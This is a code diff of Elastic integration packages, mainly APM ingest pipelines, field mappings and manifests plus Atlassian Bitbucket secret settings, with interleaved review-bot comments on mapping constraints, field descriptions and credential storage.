@@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM internal metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/rum_traces/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/rum_traces/elasticsearch/ingest_pipeline/default.yml index ec20840cac6..6aa81894264 100644 --- a/packages/apm/data_stream/rum_traces/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/rum_traces/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM RUM trace events. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
diff --git a/packages/apm/data_stream/sampled_traces/fields/base-fields.yml b/packages/apm/data_stream/sampled_traces/fields/base-fields.yml index bef973826be..d23828424bf 100644 --- a/packages/apm/data_stream/sampled_traces/fields/base-fields.yml +++ b/packages/apm/data_stream/sampled_traces/fields/base-fields.yml @@ -1,12 +1,8 @@ - name: '@timestamp' - type: date - description: Event timestamp. + external: ecs - name: data_stream.type - type: constant_keyword - description: Data stream type. + external: ecs - name: data_stream.dataset - type: constant_keyword - description: Data stream dataset. + external: ecs - name: data_stream.namespace - type: constant_keyword - description: Data stream namespace. + external: ecs diff --git a/packages/apm/data_stream/service_destination_10m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_destination_10m_metrics/elasticsearch/ingest_pipeline/default.yml index ac1034792f0..7d6fe42f17e 100644 --- a/packages/apm/data_stream/service_destination_10m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_destination_10m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service destination metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
diff --git a/packages/apm/data_stream/service_destination_10m_metrics/fields/fields.yml b/packages/apm/data_stream/service_destination_10m_metrics/fields/fields.yml index 5680e9aa451..093d5a76d49 100644 --- a/packages/apm/data_stream/service_destination_10m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_destination_10m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_destination description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 10m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_destination_1m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_destination_1m_metrics/elasticsearch/ingest_pipeline/default.yml index ac1034792f0..7d6fe42f17e 100644 --- a/packages/apm/data_stream/service_destination_1m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_destination_1m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service destination metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
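Review bot: `value: 10m` on `metricset.interval` and `value: service_destination` on `metricset.name` turn these constant_keyword mappings into hard constraints: a document that reaches this data stream with any other value is rejected at index time rather than stored, so the values must match exactly what APM Server emits for `service_destination_10m_metrics`. The same addition appears for the 1m and 60m siblings and for the service_summary, service_transaction and transaction streams on the following lines, each with its own interval value, so a mismatch in any one copy would silently drop that stream's documents. A one-line comment beside each value, `# must match the interval in the data stream name; documents with a different value are rejected`, would make the coupling explicit for the next person who copies one of these files.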
diff --git a/packages/apm/data_stream/service_destination_1m_metrics/fields/fields.yml b/packages/apm/data_stream/service_destination_1m_metrics/fields/fields.yml index 5680e9aa451..bf44c821550 100644 --- a/packages/apm/data_stream/service_destination_1m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_destination_1m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_destination description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 1m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_destination_60m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_destination_60m_metrics/elasticsearch/ingest_pipeline/default.yml index ac1034792f0..7d6fe42f17e 100644 --- a/packages/apm/data_stream/service_destination_60m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_destination_60m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service destination metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
diff --git a/packages/apm/data_stream/service_destination_60m_metrics/fields/fields.yml b/packages/apm/data_stream/service_destination_60m_metrics/fields/fields.yml index 5680e9aa451..f6fb5864698 100644 --- a/packages/apm/data_stream/service_destination_60m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_destination_60m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_destination description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 60m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_summary_10m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_summary_10m_metrics/elasticsearch/ingest_pipeline/default.yml index cdeeaf902d6..2cd7443e6ba 100644 --- a/packages/apm/data_stream/service_summary_10m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_summary_10m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service summary metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
diff --git a/packages/apm/data_stream/service_summary_10m_metrics/fields/fields.yml b/packages/apm/data_stream/service_summary_10m_metrics/fields/fields.yml index 9f51d990a5f..1f74c1a1190 100644 --- a/packages/apm/data_stream/service_summary_10m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_summary_10m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_summary description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 10m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_summary_1m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_summary_1m_metrics/elasticsearch/ingest_pipeline/default.yml index cdeeaf902d6..2cd7443e6ba 100644 --- a/packages/apm/data_stream/service_summary_1m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_summary_1m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service summary metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
diff --git a/packages/apm/data_stream/service_summary_1m_metrics/fields/fields.yml b/packages/apm/data_stream/service_summary_1m_metrics/fields/fields.yml index 9f51d990a5f..561239397da 100644 --- a/packages/apm/data_stream/service_summary_1m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_summary_1m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_summary description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 1m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_summary_60m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_summary_60m_metrics/elasticsearch/ingest_pipeline/default.yml index cdeeaf902d6..2cd7443e6ba 100644 --- a/packages/apm/data_stream/service_summary_60m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_summary_60m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service summary metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
diff --git a/packages/apm/data_stream/service_summary_60m_metrics/fields/fields.yml b/packages/apm/data_stream/service_summary_60m_metrics/fields/fields.yml index 9f51d990a5f..d785a765141 100644 --- a/packages/apm/data_stream/service_summary_60m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_summary_60m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_summary description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 60m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml index 38e76f8d08c..2e4b1fdac48 100644 --- a/packages/apm/data_stream/service_transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
diff --git a/packages/apm/data_stream/service_transaction_10m_metrics/fields/fields.yml b/packages/apm/data_stream/service_transaction_10m_metrics/fields/fields.yml index a44ae0bdc31..64ed586c815 100644 --- a/packages/apm/data_stream/service_transaction_10m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_transaction_10m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_transaction description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 10m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml index 38e76f8d08c..2e4b1fdac48 100644 --- a/packages/apm/data_stream/service_transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
diff --git a/packages/apm/data_stream/service_transaction_1m_metrics/fields/fields.yml b/packages/apm/data_stream/service_transaction_1m_metrics/fields/fields.yml index a44ae0bdc31..75f5c4073ab 100644 --- a/packages/apm/data_stream/service_transaction_1m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_transaction_1m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_transaction description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 1m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml index 38e76f8d08c..2e4b1fdac48 100644 --- a/packages/apm/data_stream/service_transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id 
diff --git a/packages/apm/data_stream/service_transaction_60m_metrics/fields/fields.yml b/packages/apm/data_stream/service_transaction_60m_metrics/fields/fields.yml index a44ae0bdc31..53db5097aa4 100644 --- a/packages/apm/data_stream/service_transaction_60m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_transaction_60m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_transaction description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 60m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/traces/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/traces/elasticsearch/ingest_pipeline/default.yml index c1bfda802ec..4b26039a4cf 100644 --- a/packages/apm/data_stream/traces/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/traces/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM trace events. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/traces/fields/fields.yml b/packages/apm/data_stream/traces/fields/fields.yml index d54cf979d18..d92e6fa00e4 100644 --- a/packages/apm/data_stream/traces/fields/fields.yml 
+++ b/packages/apm/data_stream/traces/fields/fields.yml @@ -430,3 +430,7 @@ scaling_factor: 1000000 description: | Custom key/value pairs. Can be used to add meta information to events. Should not contain nested objects. All values are stored as scaled_float. +- name: transaction.profiler_stack_trace_ids + type: counted_keyword + description: | + Counted keyword of universal profiling stacktraces IDs captured by the profiler for this transaction. diff --git a/packages/apm/data_stream/transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml index f3145bdac74..b187f99b6b2 100644 --- a/packages/apm/data_stream/transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/transaction_10m_metrics/fields/fields.yml b/packages/apm/data_stream/transaction_10m_metrics/fields/fields.yml index 97a1f0ff7c8..b1096b85d49 100644 --- a/packages/apm/data_stream/transaction_10m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/transaction_10m_metrics/fields/fields.yml 
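Review bot: The description of the new `transaction.profiler_stack_trace_ids` field reads awkwardly and repeats the type; `Stack trace IDs captured by Universal Profiling for this transaction.` says the same thing without the "Counted keyword of ... stacktraces IDs" phrasing, and the README row added further down should mirror whichever wording is kept. `counted_keyword` is also a fairly recent field type, so the package's Kibana/stack version constraint, which is not visible in this diff, should be checked against the minimum that supports it before the mapping ships.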
@@ -1,5 +1,6 @@ - name: metricset.interval type: constant_keyword + value: 10m description: Metricset aggregation interval. - name: faas.coldstart type: boolean @@ -27,6 +28,7 @@ Kubernetes pod name - name: metricset.name type: constant_keyword + value: transaction description: | Name of the set of metrics. - name: processor.event diff --git a/packages/apm/data_stream/transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml index f3145bdac74..b187f99b6b2 100644 --- a/packages/apm/data_stream/transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/transaction_1m_metrics/fields/fields.yml b/packages/apm/data_stream/transaction_1m_metrics/fields/fields.yml index 97a1f0ff7c8..bcc4af4716d 100644 --- a/packages/apm/data_stream/transaction_1m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/transaction_1m_metrics/fields/fields.yml 
@@ -1,5 +1,6 @@ - name: metricset.interval type: constant_keyword + value: 1m description: Metricset aggregation interval. - name: faas.coldstart type: boolean @@ -27,6 +28,7 @@ Kubernetes pod name - name: metricset.name type: constant_keyword + value: transaction description: | Name of the set of metrics. - name: processor.event diff --git a/packages/apm/data_stream/transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml index f3145bdac74..b187f99b6b2 100644 --- a/packages/apm/data_stream/transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/transaction_60m_metrics/fields/fields.yml b/packages/apm/data_stream/transaction_60m_metrics/fields/fields.yml index 97a1f0ff7c8..b07cddfd821 100644 --- a/packages/apm/data_stream/transaction_60m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/transaction_60m_metrics/fields/fields.yml 
@@ -1,5 +1,6 @@ - name: metricset.interval type: constant_keyword + value: 60m description: Metricset aggregation interval. - name: faas.coldstart type: boolean @@ -27,6 +28,7 @@ Kubernetes pod name - name: metricset.name type: constant_keyword + value: transaction description: | Name of the set of metrics. - name: processor.event diff --git a/packages/apm/docs/README.md b/packages/apm/docs/README.md index 2f811c4ab19..d2fdc94a31c 100644 --- a/packages/apm/docs/README.md +++ b/packages/apm/docs/README.md @@ -191,6 +191,7 @@ See [APM data streams](https://ela.st/apm-data-streams) for more information. | transaction.message.routing_key | The message routing key | keyword | | | transaction.name | Generic designation of a transaction in the scope of a single service (eg. 'GET /users/:id'). | keyword | | | transaction.name.text | Multi-field of `transaction.name`. | text | | +| transaction.profiler_stack_trace_ids | Counted keyword of universal profiling stacktraces IDs captured by the profiler for this transaction. | counted_keyword | | | transaction.representative_count | The approximate number of transactions represented, based on the inverse sampling rate. | scaled_float | | | transaction.result | The result of the transaction. HTTP status code for HTTP-related transactions. | keyword | | | transaction.sampled | Transactions that are 'sampled' will include all available information. Transactions that are not sampled will not have spans or context. | boolean | | diff --git a/packages/apm/manifest.yml b/packages/apm/manifest.yml index cd87ade59f6..b1bbd3180e9 100644 --- a/packages/apm/manifest.yml +++ b/packages/apm/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.1 +format_version: 3.1.0 name: apm title: Elastic APM -version: 8.13.0-preview-1 +version: 8.13.1-preview-1708411360 description: Monitor, detect, and diagnose complex application performance issues. type: integration categories: ["elastic_stack", "monitoring"] 
@@ -54,9 +54,13 @@ policy_templates: default: http://localhost:8200 - name: secret_token type: text + # setting false due to https://github.com/elastic/apm-server/issues/11450 + secret: false - name: api_key_enabled type: bool default: false + # secret param is required to pass validation as name contains api_key + secret: false - name: enable_rum type: bool default: true @@ -96,6 +100,8 @@ policy_templates: - name: api_key_limit type: integer default: 100 + # secret param is required to pass validation as name contains api_key + secret: false - name: max_event_bytes type: integer default: 307200 diff --git a/packages/arista_ngfw/changelog.yml b/packages/arista_ngfw/changelog.yml index 9500abd2d6b..9d005b7e430 100755 --- a/packages/arista_ngfw/changelog.yml +++ b/packages/arista_ngfw/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/arista_ngfw/manifest.yml b/packages/arista_ngfw/manifest.yml index 2d75018c3ac..025e5de3e5b 100755 --- a/packages/arista_ngfw/manifest.yml +++ b/packages/arista_ngfw/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: arista_ngfw title: "Arista NG Firewall" -version: "1.0.1" +version: "1.1.0" source: license: "Elastic-2.0" description: "Collect logs and metrics from Arista NG Firewall." diff --git a/packages/atlassian_bitbucket/changelog.yml b/packages/atlassian_bitbucket/changelog.yml index 8b04f6bf9dc..a35968cfdab 100644 --- a/packages/atlassian_bitbucket/changelog.yml +++ b/packages/atlassian_bitbucket/changelog.yml 
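Review bot: `secret: false` on `secret_token` opts a bearer credential out of Fleet's secret storage, so as far as I read the package spec the token stays in the agent policy itself and is visible wherever that policy is displayed; the inline comment records the reason (the linked apm-server issue) but gives no path back. Suggest turning it into a tracked item, e.g. `# TODO: switch to secret: true once https://github.com/elastic/apm-server/issues/11450 is resolved; until then the token is kept in the plain policy`. For `api_key_enabled` (a bool) and `api_key_limit` (an integer) the comment could state plainly that `secret: false` only silences the name-based `api_key` validation and that neither value is a credential, so a reader does not mistake them for the same trade-off.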
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.22.2" changes: - description: Changed owners diff --git a/packages/atlassian_bitbucket/data_stream/audit/manifest.yml b/packages/atlassian_bitbucket/data_stream/audit/manifest.yml index 9ac09bca15d..ea7531e627c 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/manifest.yml +++ b/packages/atlassian_bitbucket/data_stream/audit/manifest.yml @@ -80,6 +80,7 @@ streams: multi: false required: false show_user: true + secret: true - name: token type: password title: Personal Access Token @@ -87,6 +88,7 @@ streams: required: false multi: false show_user: true + secret: true - name: http_client_timeout type: text title: HTTP Client Timeout diff --git a/packages/atlassian_bitbucket/manifest.yml b/packages/atlassian_bitbucket/manifest.yml index e51b2b69f65..5418f112afc 100644 --- a/packages/atlassian_bitbucket/manifest.yml +++ b/packages/atlassian_bitbucket/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: atlassian_bitbucket title: Atlassian Bitbucket -version: "1.22.2" +version: "1.23.0" description: Collect logs from Atlassian Bitbucket with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - productivity_security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/bitbucket-logo.svg title: Bitbucket Logo diff --git a/packages/atlassian_confluence/changelog.yml b/packages/atlassian_confluence/changelog.yml index af07b21db55..6c2f78ca1d3 100644 --- a/packages/atlassian_confluence/changelog.yml +++ b/packages/atlassian_confluence/changelog.yml 
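Review bot: The parameter that receives the first `secret: true` in the audit data stream manifest begins above the hunk, so its `type` is not visible; the `token` entry directly below is `type: password`, and the auth0 hunk further down in this diff switches its field from `type: text` to `type: password` together with `secret: true`, so the first parameter here should be checked for the same pairing, otherwise the value is protected at rest but still rendered as plain text in the form. The same pair of hunks recurs for atlassian_confluence and atlassian_jira on the following lines. The `kibana.version` bump to `^8.12.0` together with `format_version` 3.0.2 in the package manifest is the right companion to `secret: true`.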
